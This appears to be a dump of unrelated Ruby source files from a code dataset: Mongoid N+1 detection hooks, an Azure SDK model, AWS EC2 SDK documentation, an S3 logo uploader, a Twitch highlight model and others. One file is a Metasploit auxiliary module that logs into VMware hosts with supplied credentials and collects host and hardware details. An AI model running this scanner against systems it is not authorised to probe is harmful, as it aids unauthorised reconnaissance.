      intent_json[:templates] = processed_utterances
      new_user_says, new_params = user_says_value(intent_json[:responses][0][:parameters])
      intent_json[:userSays] = new_user_says
      intent_json[:responses][0][:parameters] = new_params

      # Replace the responses, if a response file exists for this intent.
      intent_json[:responses][0][:messages][0][:speech] = responses if @responses_file

      # Clean up portions of the JSON response that we don't need in the request
      ATTRIBUTES_TO_REMOVE.each { |key| intent_json.delete(key.to_sym) }

      response = @api_client.update_intent_request(intent_json)

      handle_response(response, :intent)
    end

    private

    # Generate new user utterances based on the Expando source for this intent.
    #
    # @return [Array<Hash>] The new `userSays` attribute.
    def processed_utterances
      @processed_utterances ||= Expando::Expander.expand! @source_file.lines
    end

    # Builds the new `userSays` entries and the merged parameter list.
    # Mutates a copy of each utterance while consuming entity references
    # left-to-right.
    #
    # TODO: High- document, test, and decompose
    def user_says_value(existing_params)
      # Set so re-encountered parameter names are not duplicated.
      additional_params = Set.new(existing_params)

      new_user_says = processed_utterances.collect do |utterance|
        # If an entity is referenced on this line...
        if utterance.match(Expando::Tokens::ENTITY_REF_MATCHER)
          template = utterance.dup
          data = []

          # For every matching entity reference...
          utterance.scan(Expando::Tokens::ENTITY_REF_MATCHER).each do |entity_reference|
            # (last_letter is captured by the matcher but unused here.)
            entity_name, is_system_entity, last_letter, parameter_name = entity_reference

            param_data_type = "@#{entity_name}"
            param_value = "$#{parameter_name}"

            # Unless the param is already in the list...
            unless additional_params.select { |p| p[:name] == parameter_name }.first
              # ...add the new param to the list of params.
              additional_params << {
                dataType: param_data_type,
                name: parameter_name,
                value: param_value,
                isList: false
              }
            end

            # Find a random value to use for the entity.
            example_entity_value = example_entity_value(entity_name, is_system_entity)

            # Add data entries.
            data << { text: template.match(Expando::Tokens::UNTIL_ENTITY_REF_MATCHER)[0] }
            data << {
              text: example_entity_value,
              alias: parameter_name,
              meta: "@#{entity_name}"
            }

            # Remove the processed portions from the template string
            template.sub!(Expando::Tokens::UNTIL_ENTITY_REF_MATCHER, '')
            template.sub!(Expando::Tokens::ENTITY_REF_MATCHER, '')
          end

          # Add everything that remains.
          data << {
            text: template
          }

          {
            data: data,
            isTemplate: false
          }
        else
          {
            data: [
              text: utterance
            ],
            # TODO: Make this an option
            isTemplate: false
          }
        end
      end

      [new_user_says, additional_params.to_a]
    end

    # Find a random value for the given entity.
    #
    # @param entity_name [String] The name of the entity.
    # @param is_system_entity [Boolean] true if this is an API.ai system entity.
    #
    # @return [String] The random entity value.
    def example_entity_value(entity_name, is_system_entity)
      # If this is a system entity...
      if is_system_entity
        # ...grab a random canonical value for the entity.
        Expando::ApiAi::SystemEntityExamples::VALUES[entity_name].sample
      # If this is a developer entity...
      else
        # ...find a matching entity file.
        # TODO: High - throw an error if none.
        entity_file =
          @entity_files
            .select { |entity_file| entity_file.entity_name == entity_name }
            .first

        # Grab a random canonical value for the entity.
        entity_file.random_canonical_value
      end
    end

    # Generate new responses for this intent based on the Expando responses source.
    #
    # @return [Array<String>] The new responses.
    def responses
      return false unless @responses_file

      Expando::Expander.expand! @responses_file.lines
    end

    # Fetch the existing intent with this name on API.ai.
    #
    # @return [Hash] The current version of the intent object on API.ai.
    def current_version
      # NOTE(review): class-variable cache — shared across all Intent instances
      # for the life of the process.
      @@intents ||= @api_client.get_intents_request
      matching_intent = @@intents.select { |intent| intent[:name] == @source_file.intent_name }

      # TODO: needs an exception class
      raise "There is no intent named #{@source_file.intent_name}" if matching_intent.empty?

      intent_id = matching_intent.first[:id]

      Expando::Logger.log "Fetching latest version of #{@source_file.intent_name} intent"
      @api_client.get_intent_request(intent_id)
    end
  end
end
| 35.303371 | 103 | 0.64147 |
module Bullet
  module Mongoid
    # Installs Bullet's detectors into Mongoid by aliasing the original
    # query-execution and relation-setter methods and wrapping them.
    def self.enable
      require 'mongoid'
      ::Mongoid::Contextual::Mongo.class_eval do
        # Keep the originals reachable under origin_* names.
        alias_method :origin_first, :first
        alias_method :origin_last, :last
        alias_method :origin_each, :each
        alias_method :origin_eager_load, :eager_load

        # A single result can never be part of an N+1 pattern.
        def first
          result = origin_first
          Bullet::Detector::NPlusOneQuery.add_impossible_object(result) if result
          result
        end

        def last
          result = origin_last
          Bullet::Detector::NPlusOneQuery.add_impossible_object(result) if result
          result
        end

        # Multi-document iteration is where N+1 queries can originate:
        # register the materialized records with the detector first.
        def each(&block)
          records = query.map{ |doc| ::Mongoid::Factory.from_db(klass, doc) }
          if records.length > 1
            Bullet::Detector::NPlusOneQuery.add_possible_objects(records)
          elsif records.size == 1
            Bullet::Detector::NPlusOneQuery.add_impossible_object(records.first)
          end
          origin_each(&block)
        end

        # Record which associations were eager loaded so Bullet can also flag
        # eager loading that is never used.
        def eager_load(docs)
          associations = criteria.inclusions.map(&:name)
          docs.each do |doc|
            Bullet::Detector::NPlusOneQuery.add_object_associations(doc, associations)
          end
          Bullet::Detector::UnusedEagerLoading.add_eager_loadings(docs, associations)
          origin_eager_load(docs)
        end
      end

      ::Mongoid::Relations::Accessors.class_eval do
        alias_method :origin_set_relation, :set_relation

        # Count association access for non-embedded relations only; embedded
        # documents come back in the parent's query and cannot cause N+1.
        def set_relation(name, relation)
          if relation && relation.relation_metadata.macro !~ /embed/
            Bullet::Detector::NPlusOneQuery.call_association(self, name)
          end
          origin_set_relation(name, relation)
        end
      end
    end
  end
end
| 31.392857 | 86 | 0.630262 |
213d404049ba10bbc45e2976c24fa45d82d605d1 | 2,759 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ApiManagement::Mgmt::V2019_01_01
  module Models
    #
    # Paged email template list representation.
    #
    # NOTE: AutoRest-generated model — regeneration will overwrite manual edits.
    class EmailTemplateCollection

      include MsRestAzure
      include MsRest::JSONable
      # @return [Array<EmailTemplateContract>] Page values.
      attr_accessor :value

      # @return [String] Next page link if any.
      attr_accessor :next_link

      # return [Proc] with next page method call.
      attr_accessor :next_method

      #
      # Gets the rest of the items for the request, enabling auto-pagination.
      #
      # @return [Array<EmailTemplateContract>] operation results.
      #
      def get_all_items
        items = @value
        page = self
        # Follow next_link until the service stops returning one.
        while page.next_link != nil && !page.next_link.strip.empty? do
          page = page.get_next_page
          items.concat(page.value)
        end
        items
      end

      #
      # Gets the next page of results.
      #
      # @return [EmailTemplateCollection] with next page content.
      #
      def get_next_page
        response = @next_method.call(@next_link).value! unless @next_method.nil?
        unless response.nil?
          @next_link = response.body.next_link
          @value = response.body.value
          self
        end
      end

      #
      # Mapper for EmailTemplateCollection class as Ruby Hash.
      # This will be used for serialization/deserialization.
      #
      def self.mapper()
        {
          client_side_validation: true,
          required: false,
          serialized_name: 'EmailTemplateCollection',
          type: {
            name: 'Composite',
            class_name: 'EmailTemplateCollection',
            model_properties: {
              value: {
                client_side_validation: true,
                required: false,
                serialized_name: 'value',
                type: {
                  name: 'Sequence',
                  element: {
                      client_side_validation: true,
                      required: false,
                      serialized_name: 'EmailTemplateContractElementType',
                      type: {
                        name: 'Composite',
                        class_name: 'EmailTemplateContract'
                      }
                  }
                }
              },
              next_link: {
                client_side_validation: true,
                required: false,
                serialized_name: 'nextLink',
                type: {
                  name: 'String'
                }
              }
            }
          }
        }
      end
    end
  end
end
| 28.153061 | 80 | 0.529177 |
module Xiki::Menu
  # Menu for browsing loaded Ruby classes, their methods, and ri docs.
  class Ruby
    def self.classes clazz=nil, method=nil
      # No class given: list every loaded class (skipping anonymous
      # #<Class:...> singletons), one "- Name/" menu line each.
      if clazz.nil?
        lines = ObjectSpace.each_object(Class).map(&:to_s).
          reject { |class_name| class_name =~ /^#/ }.
          map { |class_name| "- #{class_name}/\n" }
        return lines.sort.join
      end

      # Class but no method: list its own instance methods, then its own
      # class methods (prefixed with "::").
      if method.nil?
        target = Kernel.const_get(clazz)
        instance_part = target.instance_methods(false).sort.
          map { |m| "- #{m}/" }.join("\n")
        class_part = target.methods(false).sort.
          map { |m| "- ::#{m}/" }.join("\n")
        # NOTE(review): the two parts are concatenated with no separator,
        # exactly as before.
        return instance_part + class_part
      end

      # Class and method: show its ri documentation, stripped of ANSI escape
      # codes and quoted with "| ".
      method = "##{method}" unless method =~ /^::/
      command = "ri --format=rdoc #{clazz}#{method}"
      Console[command].gsub(/\C-[.+?m/, '').gsub(/^/, '| ').gsub(/^\| +$/, '|')
    end
  end
end
| 26.583333 | 79 | 0.508882 |
621bdd673dd1fa89436dafd6989b1553853d9d86 | 1,892 | ##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
# Scanner module: authenticates to one or more VMWare hosts over the VIM SOAP
# API and dumps a YAML summary of each host's configuration.
class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::VIMSoap
  include Msf::Auxiliary::Scanner

  # Registers module metadata and options (credentials, port, and whether to
  # enumerate hardware details as well).
  def initialize
    super(
      'Name'        => 'VMWare Enumerate Host Details',
      'Version'     => '$Revision$',
      'Description' => %Q{
        This module attempts to enumerate information about the host systems through the VMWare web API.
        This can include information about the hardware installed on the host machine.
      },
      'Author'      => ['TheLightCosine <thelightcosine[at]metasploit.com>'],
      'License'     => MSF_LICENSE
    )

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('USERNAME', [ true, "The username to Authenticate with.", 'root' ]),
        OptString.new('PASSWORD', [ true, "The password to Authenticate with.", 'password' ]),
        OptBool.new('HW_DETAILS', [true, "Enumerate the Hardware on the system as well?", false])
      ], self.class)

    register_advanced_options([OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', true]),])
  end

  # Called once per host by the Scanner mixin: logs in via the VIM SOAP API,
  # prints a YAML dump of the host summary, and stores it as loot; reports a
  # login failure otherwise.
  def run_host(ip)
    if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success
      output = "VMWare Host at #{ip} details\n"
      output << "-----------------------------\n"
      host_summary = vim_get_all_host_summary(datastore['HW_DETAILS'])
      output << YAML.dump(host_summary)
      print_good output
      # Persist the findings for later inspection.
      store_loot('vmware_host_details', "text/plain", datastore['RHOST'], output, "#{datastore['RHOST']}_vmware_host.txt", "VMWare Host Details")
    else
      print_error "Login Failure on #{ip}"
      return
    end
  end
end
| 30.516129 | 142 | 0.678118 |
# Convenience extensions on Hash: recursive merge, path-flattening, and a
# deep subset check.
class ::Hash
  # Recursively merges +second+ into self and returns a new hash. When both
  # sides hold a Hash for the same key the hashes are merged; otherwise the
  # value from +second+ wins. Neither receiver nor argument is mutated.
  # Inspired by: http://stackoverflow.com/a/9381776
  def deep_merge(second)
    merger = proc { |_key, v1, v2|
      v1.is_a?(Hash) && v2.is_a?(Hash) ? v1.merge(v2, &merger) : v2
    }
    merge(second, &merger)
  end

  # Flattens nested hashes into a single-level hash whose keys join the
  # nesting path with '-'.
  #
  #   { 'a' => 1, 'b' => { 'c' => 2 } }.smash # => { "a" => 1, "b-c" => 2 }
  #
  # @param prefix [String, nil] path accumulated so far (used by recursion).
  def smash(prefix = nil)
    each_with_object({}) do |(key, value), flat|
      path = prefix.to_s + key.to_s
      if value.is_a?(Hash)
        flat.update(value.smash(path + '-'))
      else
        flat[path] = value
      end
    end
  end

  # Deep subset check: true when every (possibly nested) key/value pair of
  # +other+ is present in self with an equal value.
  def contains(other)
    flat = smash
    other.smash.all? { |key, value| flat[key] == value }
  end
end
| 21.842105 | 67 | 0.551807 |
08c1580b1fed16ed60f7d0cf21774ee7275ce3c7 | 12,724 | # Copyright 2011 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
require 'aws/core'
require 'aws/ec2/config'
module AWS
# Provides an expressive, object-oriented interface to Amazon EC2.
#
# == Credentials
#
# You can setup default credentials for all AWS services via
# AWS.config:
#
# AWS.config(
# :access_key_id => 'YOUR_ACCESS_KEY_ID',
# :secret_access_key => 'YOUR_SECRET_ACCESS_KEY')
#
# Or you can set them directly on the EC2 interface:
#
# ec2 = AWS::EC2.new(
# :access_key_id => 'YOUR_ACCESS_KEY_ID',
# :secret_access_key => 'YOUR_SECRET_ACCESS_KEY')
#
# == Instances
#
# EC2 uses instances to run your software.
#
# To run an instance:
#
# ec2.instances.create(:image_id => "ami-8c1fece5")
#
# To get an instance by ID:
#
# i = ec2.instances["i-12345678"]
# i.exists?
#
# To get a list of instances:
#
# ec2.instances.inject({}) { |m, i| m[i.id] = i.status; m }
# # => { "i-12345678" => :running, "i-87654321" => :shutting_down }
#
# == Security Groups
#
# A security group is a named collection of access rules. These access
# rules specify which ingress (i.e., incoming) network traffic should be
# delivered to your instance. All other ingress traffic will be discarded.
#
# To create a security group:
#
# websvr = ec2.security_groups.create('webservers')
#
# Then you can add ingress authorizations. In the following example
# we add a rule that allows web traffic from the entire internet.
#
# # web traffic
# websvr.authorize_ingress(:tcp, 80)
#
# You can also specify a port range. Here we are opening FTP traffic:
#
# # ftp traffic
# websvr.authorize_ingress(:tcp, 20..21)
#
# If you want to limit an authorization to a particular CIDR IP address or
# list of address, just add them to the #authorize_ingress call.
#
# # ssh access
  #   websvr.authorize_ingress(:tcp, 22, '1.1.1.1/0', '2.2.2.2/0')
#
# You can also provide another security group instead of CIDR IP addresses.
# This allows incoming traffic from EC2 instances in the given security
# group(s).
#
# # get two existing security groups
# dbsvrs = ec2.security_groups['db-servers']
# websvrs = ec2.security_groups['web-servers']
#
# # allow instances in the 'web-servers' security group to connect
# # to instances in the 'db-servers' security group over tcp port 3306
# dbsvrs.authorize_ingress(:tcp, 3306, websvrs)
#
# There are a few handy shortcuts for allowing pings:
#
  #   websvrs.allow_ping
#
# Just like with authorize_ingress you can pass a security group or a list
# of CIDR IP addresses to allow ping to limit where you can ping from.
#
# You can also use the same parameters from the examples above to
# {SecurityGroup#revoke_ingress} and {SecurityGroup#disallow_ping}.
#
# You can specify other protocols than +:tcp+, like :udp and :icmp.
#
# == Elastic IPs
#
# You can allocate up to 5 elastic IP addresses for each account.
# You can associate those elastic IP addresses with EC2 instances:
#
# instance = ec2.instances['i-12345678']
# ip = ec2.elastic_ips.allocate
#
# instance.ip_address # 1.1.1.1
# ip.ip_address # 2.2.2.2
#
# instance.associate_elastic_ip(ip)
# instance.ip_address # 2.2.2.2
#
# instance.disassociate_elastic_ip
# instance.ip_address # 1.1.1.1
#
# When you are done with an elastic IP address you should release it.
# In the following example we release all elastic IP addresses that are
# not currently associated with an instance:
#
# ec2.select{|ip| !ip.associated? }.each(&:release)
#
# == Key Pairs
#
# Public Amazon Machine Image (AMI) instances have no password, and you need a
# public/private key pair to log in to them. The public key half
# of this pair is embedded in your instance, allowing you to use
# the private key to log in securely without a password.
#
# You can generate a key pair yourself and then send the public
# part to EC2 using {KeyPairCollection#import}. For example:
#
# key_pair =
# ec2.key_pairs.import("mykey", File.read("~/.ssh/identity.pub"))
#
# You can also ask EC2 to generate a key pair for you. For
# example:
#
# key_pair = ec2.key_pairs.create("mykey")
# File.open("~/.ssh/ec2", "w") do |f|
# f.write(key_pair.private_key)
# end
#
# == Filtering and Tagging
#
# Any of the collections in the interface may be filtered by a
# number of different parameters. For example, to get all the
# windows images owned by amazon where the description includes
# the string "linux", you can do this:
#
# ec2.images.with_owner("amazon").
# filter("platform", "windows").
# filter("description", "*linux*")
#
# Similarly, you can tag images, instances, security groups,
# snapshots, and volumes with free-form key-value metadata and
# filter on that metadata. For example:
#
# ec2.images["ami-123"].tags << "myapp"
# ec2.images.tagged("myapp") # will include ami-123
#
# == Regions
#
# Amazon has data centers in different areas of the world (e.g.,
# North America, Europe, Asia, etc.). Correspondingly, EC2 is
# available to use in different Regions. By launching instances in
# separate Regions, you can design your application to be closer
# to specific customers or to meet legal or other
# requirements. Prices for Amazon EC2 usage vary by Region (for
# more information about pricing by Region, go to the {Amazon EC2
# Pricing page}[http://aws.amazon.com/ec2/pricing]). You can use
# the Ruby SDK to see which regions are available for your
# account:
#
# ec2.regions.map(&:name) # => ["us-east-1", ...]
#
# The default region is +us-east-1+; you can access other regions
# like this:
#
# ec2_us_west = ec2.regions["us-west-1"]
  #   # starts an instance in us-west-1
# ec2_us_west.instances.create(:image_id => 'ami-3bc9997e')
#
# This makes a call to EC2's DescribeRegions API to find the
# endpoint for "us-west-1" -- if you just want to configure a
# different endpoint without making a call to EC2, you can do it
# like this:
#
# ec2 = AWS::EC2.new(:ec2_endpoint =>
# "ec2.us-west-1.amazonaws.com")
#
# == Availability Zones
#
# Each Region contains multiple distinct locations called
# Availability Zones. Each Availability Zone is engineered to be
# isolated from failures in other Availability zones and to
# provide inexpensive, low-latency network connectivity to other
# zones in the same Region. By launching instances in separate
# Availability Zones, you can protect your applications from the
# failure of a single location.
#
# You can use the {#availability_zones} collection to get information
# about the available zones available to your account. For
# example:
#
# ec2.availability_zones.map(&:name) # => ["us-east-1a", ...]
#
# == Images
#
# An Amazon Machine Image (AMI) contains all information necessary
# to boot instances of your software. For example, an AMI might
# contain all the software to act as a web server (e.g., Linux,
# Apache, and your web site) or it might contain all the software
# to act as a Hadoop node (e.g., Linux, Hadoop, and a custom
# application).
#
# You can use the {#images} collection to get information about
# the images available to your account. For example:
#
# ec2.images.with_owner("amazon").map(&:name)
#
# You can also use the images collection to create new images:
#
# ec2.images.create(:image_location => "mybucket/manifest.xml",
# :name => "my-image")
#
class EC2
AWS.register_autoloads(self) do
autoload :Attachment, 'attachment'
autoload :AttachmentCollection, 'attachment_collection'
autoload :AvailabilityZone, 'availability_zone'
autoload :AvailabilityZoneCollection, 'availability_zone_collection'
autoload :BlockDeviceMappings, 'block_device_mappings'
autoload :Client, 'client'
autoload :Collection, 'collection'
autoload :ConfigTransform, 'config_transform'
autoload :ElasticIp, 'elastic_ip'
autoload :ElasticIpCollection, 'elastic_ip_collection'
autoload :Errors, 'errors'
autoload :FilteredCollection, 'filtered_collection'
autoload :HasPermissions, 'has_permissions'
autoload :Image, 'image'
autoload :ImageCollection, 'image_collection'
autoload :Instance, 'instance'
autoload :InstanceCollection, 'instance_collection'
autoload :KeyPair, 'key_pair'
autoload :KeyPairCollection, 'key_pair_collection'
autoload :PermissionCollection, 'permission_collection'
autoload :Region, 'region'
autoload :RegionCollection, 'region_collection'
autoload :Request, 'request'
autoload :ReservedInstances, 'reserved_instances'
autoload :ReservedInstancesCollection, 'reserved_instances_collection'
autoload :ReservedInstancesOffering, 'reserved_instances_offering'
autoload :ReservedInstancesOfferingCollection,
'reserved_instances_offering_collection'
autoload :Resource, 'resource'
autoload :ResourceObject, 'tag_collection'
autoload :ResourceTagCollection, 'resource_tag_collection'
autoload :SecurityGroup, 'security_group'
autoload :SecurityGroupCollection, 'security_group_collection'
autoload :Snapshot, 'snapshot'
autoload :SnapshotCollection, 'snapshot_collection'
autoload :Tag, 'tag'
autoload :TagCollection, 'tag_collection'
autoload :TaggedCollection, 'tagged_collection'
autoload :TaggedItem, 'tagged_item'
autoload :Volume, 'volume'
autoload :VolumeCollection, 'volume_collection'
end
include Core::ServiceInterface
# @return [InstanceCollection] A collection representing all instances
def instances
InstanceCollection.new(:config => config)
end
# @return [SecurityGroupCollection] A collection representing all security
# groups.
def security_groups
SecurityGroupCollection.new(:config => config)
end
# @return [ElasticIpCollection] A collection representing all
# elastic IP addresses for this account.
def elastic_ips
ElasticIpCollection.new(:config => config)
end
# @return [KeyPairCollection] A collection representing all key pairs.
def key_pairs
KeyPairCollection.new(:config => config)
end
# @return [TagCollection] A collection representing all EC2 tags for
# all resource types.
def tags
TagCollection.new(:config => config)
end
# @return [RegionCollection] A collection representing all EC2
# regions.
def regions
RegionCollection.new(:config => config)
end
# @return [AvailabilityZoneCollection] A collection representing
# all EC2 availability zones.
def availability_zones
AvailabilityZoneCollection.new(:config => config)
end
# @return [ImageCollection] A collection representing
# all Amazon Machine Images available to your account.
def images
ImageCollection.new(:config => config)
end
# @return [VolumeCollection] A collection representing
# all EBS volumes available to your account.
def volumes
VolumeCollection.new(:config => config)
end
# @return [ReservedInstancesCollection] A collection representing all
# purchased reserved instance offerings.
def reserved_instances
ReservedInstancesCollection.new(:config => config)
end
# @return [ReservedInstancesOfferingCollection] A collection representing all
# reserved instance offerings that may be purchased.
def reserved_instances_offerings
ReservedInstancesOfferingCollection.new(:config => config)
end
# @return [SnapshotCollection] A collection representing
# all EBS snapshots available to your account.
def snapshots
SnapshotCollection.new(:config => config)
end
end
end
| 36.045326 | 81 | 0.687127 |
085f4f316a1d8cfdf1bde71453da4c54429163e6 | 2,863 | module PartnerLogoUploader
CONTENT_TYPES = [
'image/png',
'image/jpeg'
].freeze
def self.content_types
CONTENT_TYPES.join(', ')
end
def self.form params
raise if params[:partner_id].blank?
raise if params[:redirect_url].blank?
raise unless params[:filetype].in?(CONTENT_TYPES)
extension = EXTENSIONS[params[:filetype]]
raise if extension.nil?
key = "#{SecureRandom.uuid}.#{extension}"
s3_object = storage.object("partners/logo/#{key}")
payload = {
object_url: s3_object.public_url,
partner_id: params[:partner_id]
}
redirect_url = append_payload(payload, to: params[:redirect_url])
post_data = s3_object.presigned_post(
signature_expiration: 1.minute.from_now,
acl: 'public-read',
cache_control: "private, max-age=#{1.year.to_i}",
content_type: params[:filetype],
success_action_redirect: redirect_url
)
return {
url: post_data.url,
fields: post_data.fields
}
end
def self.handle_success params
payload = PartnerLogoUploader.payload(params)
raise if payload.nil?
partner = Partner.find(payload[:partner_id])
previous_logo = partner.large_logo_url
partner.update_column(:large_logo_url, payload[:object_url])
AsyncService.new(self).delete_s3_object_with_public_url(previous_logo)
partner
end
def self.delete_s3_object_with_public_url url
s3_object_with_public_url(url)&.delete
end
private
EXTENSIONS = {
'image/png' => 'png',
'image/jpeg' => 'jpeg',
}.freeze
def self.payload params
extract_payload(params: params, keys: [:object_url, :partner_id])
end
def self.storage
Storage::Client.avatars
end
def self.append_payload payload, to:
payload = sign_payload(payload)
url = URI(to)
url_params = CGI.parse(url.query || '')
payload.each do |key, value|
url_params[key.to_s] = value
end
url.query = URI.encode_www_form(url_params).presence
url.to_s
end
def self.sign_payload payload, expiration: 1.minute.from_now
payload[:signature_expiration] = expiration.to_i
payload.delete(:signature)
payload[:signature] = SignatureService.sign(signature_key(payload))
payload
end
def self.signature_key params
URI.encode_www_form(params.sort_by { |key, _| key.to_s })
end
def self.extract_payload params:, keys:
payload = params.slice(*keys, :signature_expiration)
return nil if payload[:signature_expiration].to_i < Time.now.to_i
return nil unless SignatureService.validate(signature_key(payload), params[:signature])
payload.except(:signature_expiration)
end
def self.s3_object_with_public_url url
base_url = storage.object(nil).public_url
return nil unless url.starts_with?(base_url)
key = url[base_url.length..-1]
storage.object(key)
end
end
| 25.792793 | 91 | 0.702061 |
ac9f37d290c958cbecd4041d2f2617667b189ed5 | 2,564 | class HighlightSuggestion < ApplicationRecord
belongs_to :run
validates :run, uniqueness: true
class << self
# from_run looks on Twitch for past broadcasts whose timestamps show that it contains the given run's PB. If found,
# the highlight suggestion is created and returned. If not found, nothing is created and something falsey is
# returned.
def from_run(run)
return if run.user.nil? || run.user.twitch.nil?
return run.highlight_suggestion if run.highlight_suggestion.present?
pb = run.histories.where.not(started_at: nil).where.not(ended_at: nil).find_by(
realtime_duration_ms: run.duration(Run::REAL).to_ms,
gametime_duration_ms: run.duration(Run::GAME).to_ms
)
return if pb.nil? || pb.duration(Run::REAL).nil?
run.user.twitch.videos.each do |video|
match = /^((\d+)h)?((\d+)m)?((\d+)s)?$/.match(video['duration'])
hours = match[2].to_i.hours
minutes = match[4].to_i.minutes
seconds = match[6].to_i.seconds
video_start = DateTime.parse(video['created_at'])
video_end = video_start + hours + minutes + seconds
# subtracting DateTimes gives fractional days; we want seconds
video_duration = (video_end - video_start) * 1.day
next unless video_start - 30.seconds < pb.started_at && video_end + 30.seconds > pb.ended_at
video_time_at_pb_start = pb.started_at - video_start
video_time_at_pb_end = video_time_at_pb_start + (pb.duration(Run::REAL).to_ms / 1000)
highlight_suggestion = create(
run: run,
url: URI.parse("https://dashboard.twitch.tv/u/#{run.user.twitch.name}/content/video-producer/highlighter/#{video['id']}").tap do |uri|
uri.query = {
start: [0, (video_time_at_pb_start - 10.seconds).to_i].max,
end: [video_duration.to_i, (video_time_at_pb_end + 10.seconds).to_i].min,
title: "PB: #{run.game} #{run.category} in #{run.duration(run.default_timing).format}"
}.to_query
end
)
if highlight_suggestion.persisted?
# 60 days is life of archives for Partners / Twitch Prime members
HighlightCleanupJob.set(wait_until: video_start + 60.days).perform_later(highlight_suggestion)
end
return highlight_suggestion
end
nil
rescue RestClient::ExceptionWithResponse => e
Rails.logger.error([e.message, *e.backtrace].join($RS))
Rollbar.error(e, response: e.response)
nil
end
end
end
| 41.354839 | 144 | 0.652496 |
bbed6d9686b1a442c79354739534963f402dc8fd | 53 | class ChattingController < FayeRails::Controller
end
| 17.666667 | 48 | 0.849057 |
ff8b80c529b70765f50076c6259a79b4d2eec113 | 183 | # Sample code from Programming Ruby, page 548
a = [ 'cat', 'dog' ]
b = [ 'cat', 'dog' ]
a == b          # => true:  element-by-element equality
# Object#id was removed in Ruby 1.9; object_id is the modern spelling
# (the original `a.id` raises NoMethodError on any supported Ruby).
a.object_id == b.object_id # => false: two distinct array objects
a.eql?(b)       # => true:  eql? also compares array contents
a.equal?(b)     # => false: equal? is strict identity comparison
| 22.875 | 44 | 0.377049 |
39d9199a5213257fb1ac8162d0ea84cea8664ccc | 2,393 | # frozen_string_literal: true
# Specs for Barong::RedisSession, the Redis-backed session registry
# (keys are written through Rails.cache with per-session TTLs).
describe Barong::RedisSession do
  let!(:create_member_permission) do
    create :permission,
           role: 'member'
  end
  let!(:user) { create(:user) }
  let!(:session_id) { SecureRandom.hex(16) }
  # NOTE(review): hash_sid is not referenced by any example below.
  let!(:hash_sid) { Barong::RedisSession.hexdigest_session(session_id) }
  let!(:encrypted_value) { Barong::RedisSession.encrypted_session(session_id) }
  after(:each) { clear_redis }
  context 'add' do
    before(:each) { clear_redis }
    # The stored value is the encrypted session id, not the raw one.
    it 'add session key' do
      Barong::RedisSession.add(user.uid, session_id, 120)
      key = Barong::RedisSession.key_name(user.uid, session_id)
      expect(Rails.cache.read(key)).to eq encrypted_value
    end
  end
  context 'delete' do
    before(:each) { clear_redis }
    it 'delete key from redis list' do
      Barong::RedisSession.add(user.uid, session_id, 120)
      key = Barong::RedisSession.key_name(user.uid, session_id)
      expect(Rails.cache.read(key)).to eq encrypted_value
      res = Barong::RedisSession.delete(user.uid, session_id)
      # 1 is the number of keys Redis reports as removed.
      expect(res).to eq 1
      expect(Rails.cache.read(key)).to eq nil
    end
  end
  context 'update' do
    before(:each) { clear_redis }
    # Shrinking the TTL to ~0 makes the key expire immediately.
    it 'should update redis session expire time' do
      key = Barong::RedisSession.key_name(user.uid, session_id)
      Barong::RedisSession.add(user.uid, session_id, 10)
      expect(Rails.cache.read(key)).to eq encrypted_value
      Barong::RedisSession.update(user.uid, session_id, 0.00000001)
      expect(Rails.cache.read(key)).to eq nil
    end
  end
  context 'invalidate_all' do
    before(:each) { clear_redis }
    before(:each) do
      5.times {
        session_id = SecureRandom.hex(16)
        Barong::RedisSession.add(user.uid, session_id, 60)
      }
    end
    context 'without session id' do
      it 'should invalidate all sessions' do
        expect(Rails.cache.redis.keys.length).to eq 5
        Barong::RedisSession.invalidate_all(user.uid)
        expect(Rails.cache.redis.keys).to eq []
      end
    end
    context 'with session id' do
      # Passing a session id keeps that one session alive.
      it 'should invalidate all sessions except one' do
        sid = SecureRandom.hex(16)
        Barong::RedisSession.add(user.uid, sid, 60)
        expect(Rails.cache.redis.keys.length).to eq 6
        Barong::RedisSession.invalidate_all(user.uid, sid)
        expect(Rails.cache.redis.keys.length).to eq 1
      end
    end
  end
end
| 27.825581 | 79 | 0.666109 |
219b85bd6398e46b215e74e101bdd17dd8f99893 | 1,470 | require File.dirname(__FILE__) + '/../../../test/test_helper'
require File.dirname(__FILE__) + '/../../spec_helper'
require 'admin/tags_controller'
# Re-raise errors caught by the controller.
class Admin::TagsController; def rescue_action(e) raise e end; end
describe Admin::TagsController do
  # All examples act as the admin user tobi.
  before do
    request.session = { :user => users(:tobi).id }
  end
  describe 'index action' do
    before :each do
      get :index
    end
    it 'should be success' do
      response.should be_success
    end
    it 'should render template index' do
      response.should render_template('index')
    end
  end
  describe 'edit action' do
    before(:each) do
      @tag_id = contents(:article1).tags.first.id
      get :edit, :id => @tag_id
    end
    it 'should be success' do
      response.should be_success
    end
    it 'should render template edit' do
      response.should render_template('edit')
    end
    it 'should assigns value :tag' do
      assert_valid assigns(:tag)
    end
  end
  describe 'update action' do
    before :each do
      @tag = Tag.find_by_id(contents(:article1).tags.first.id)
      post :edit, 'id' => @tag.id, 'tag' => {:name => 'foobar', :display_name => 'Foo Bar'}
    end
    it 'should redirect to index' do
      response.should redirect_to(:action => 'index')
    end
    it 'should update tag' do
      @tag.reload
      @tag.name.should == 'foobar'
      # Was `@tag.display_name == "Foo Bar"` — a bare comparison whose result
      # was discarded, so a wrong display_name could never fail this example.
      @tag.display_name.should == "Foo Bar"
    end
  end
end
| 20.704225 | 91 | 0.634694 |
210928cfc4c149e2213a0920b023864971aa1817 | 3,876 | require "spec_helper"
require "active_model/serializer_support"
require "app/models/pricing"
# Specs for the Pricing value object. The same attribute literals were
# previously repeated in almost every example; they are now centralised in
